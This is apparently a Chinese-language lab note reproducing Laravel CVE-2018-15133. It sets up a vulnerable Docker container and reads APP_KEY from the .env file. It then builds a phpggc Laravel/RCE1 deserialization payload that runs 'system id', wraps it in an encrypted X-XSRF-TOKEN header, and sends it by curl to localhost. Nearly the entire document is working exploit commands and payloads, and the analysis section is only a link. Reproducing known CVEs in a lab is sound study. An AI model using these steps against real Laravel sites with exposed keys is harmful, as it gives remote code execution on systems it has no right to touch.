0%

laravel

0x00 漏洞环境搭建

https://hub.docker.com/r/kozmico/laravel-poc-cve-2018-15133

https://github.com/kozmic/laravel-poc-CVE-2018-15133

docker pull kozmico/laravel-poc-cve-2018-15133

docker run -d -p 8000:8000 CONTAINERID

0x01 漏洞复现

获取APP_KEY

1
2
3
$ docker exec -it $(docker ps --latest --quiet) grep -e \^APP_KEY /var/www/html/laravel/.env

APP_KEY=base64:9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk=

反序列化生产工具

1
2
3
4
5
6
7
$ git clone https://github.com/iansangaji/laravel-rce-cve-2018-15133.git

$ cd laravel-rce-cve-2018-15133

$ php ./phpggc Laravel/RCE1 system id -b

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjI6ImlkIjt9

exp

1
2
3
4
5
6
7
8
$ git clone https://github.com/kozmic/laravel-poc-CVE-2018-15133.git

$ cd laravel-poc-CVE-2018-15133

$ php cve-2018-15133.php 9UZUmEfHhV7WXXYewtNRtCxAYdQt44IAgJUKXk2ehRk= Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjI6ImlkIjt9

HTTP header for POST request:
X-XSRF-TOKEN: eyJpdiI6Im9vOFwvNjN5NWpuTzV6dHpzMlhaTnp3PT0iLCJ2YWx1ZSI6IjFRbndXMjBYSklJV1paTW5YNkEwR2Njd010SkJuUE5JTXBEUHNGOUtRWklyMGYrYjFIOE5kYkxkQ2tMRGx3K3MyUU1yS2ljQjU3T25sUXhaZ1RwVXVIQkZvbis5UDUyZmhZemFcL1VSQmFpK2poTW9GdzBqVmRsQ05WeStSc3NuRjRiM1dONlZsWWpJN0NLOWhJV3R5RU51cnJadlwvVjZocjRFSXdrbkJSR3QwRTFObW9adlVreHluMEFOZlRcL21KcnJCQTgzZmZFVSs0a3h4R1ZkS2lIY1VsMG9Yd2tGeTdpcWFUQnJmbEV5Tms9IiwibWFjIjoiMGUwMTI1ZDdhNjlmMGZiZGIxMGQwNzJhODk0NWRhMDIyZWFjZTMwMTNiYTllNjYxN2YzZmMxZTk5ZTEzZWI1NSJ9

POST payload

1
2
POST / HTTP/1.1
X-XSRF-TOKEN: eyJpdiI6Im9vOFwvNjN5NWpuTzV6dHpzMlhaTnp3PT0iLCJ2YWx1ZSI6IjFRbndXMjBYSklJV1paTW5YNkEwR2Njd010SkJuUE5JTXBEUHNGOUtRWklyMGYrYjFIOE5kYkxkQ2tMRGx3K3MyUU1yS2ljQjU3T25sUXhaZ1RwVXVIQkZvbis5UDUyZmhZemFcL1VSQmFpK2poTW9GdzBqVmRsQ05WeStSc3NuRjRiM1dONlZsWWpJN0NLOWhJV3R5RU51cnJadlwvVjZocjRFSXdrbkJSR3QwRTFObW9adlVreHluMEFOZlRcL21KcnJCQTgzZmZFVSs0a3h4R1ZkS2lIY1VsMG9Yd2tGeTdpcWFUQnJmbEV5Tms9IiwibWFjIjoiMGUwMTI1ZDdhNjlmMGZiZGIxMGQwNzJhODk0NWRhMDIyZWFjZTMwMTNiYTllNjYxN2YzZmMxZTk5ZTEzZWI1NSJ9
1
curl localhost:8000 -X POST -H 'X-XSRF-TOKEN: eyJpdiI6Im9vOFwvNjN5NWpuTzV6dHpzMlhaTnp3PT0iLCJ2YWx1ZSI6IjFRbndXMjBYSklJV1paTW5YNkEwR2Njd010SkJuUE5JTXBEUHNGOUtRWklyMGYrYjFIOE5kYkxkQ2tMRGx3K3MyUU1yS2ljQjU3T25sUXhaZ1RwVXVIQkZvbis5UDUyZmhZemFcL1VSQmFpK2poTW9GdzBqVmRsQ05WeStSc3NuRjRiM1dONlZsWWpJN0NLOWhJV3R5RU51cnJadlwvVjZocjRFSXdrbkJSR3QwRTFObW9adlVreHluMEFOZlRcL21KcnJCQTgzZmZFVSs0a3h4R1ZkS2lIY1VsMG9Yd2tGeTdpcWFUQnJmbEV5Tms9IiwibWFjIjoiMGUwMTI1ZDdhNjlmMGZiZGIxMGQwNzJhODk0NWRhMDIyZWFjZTMwMTNiYTllNjYxN2YzZmMxZTk5ZTEzZWI1NSJ9'| head -n 2

0x02 漏洞分析

https://xz.aliyun.com/t/6533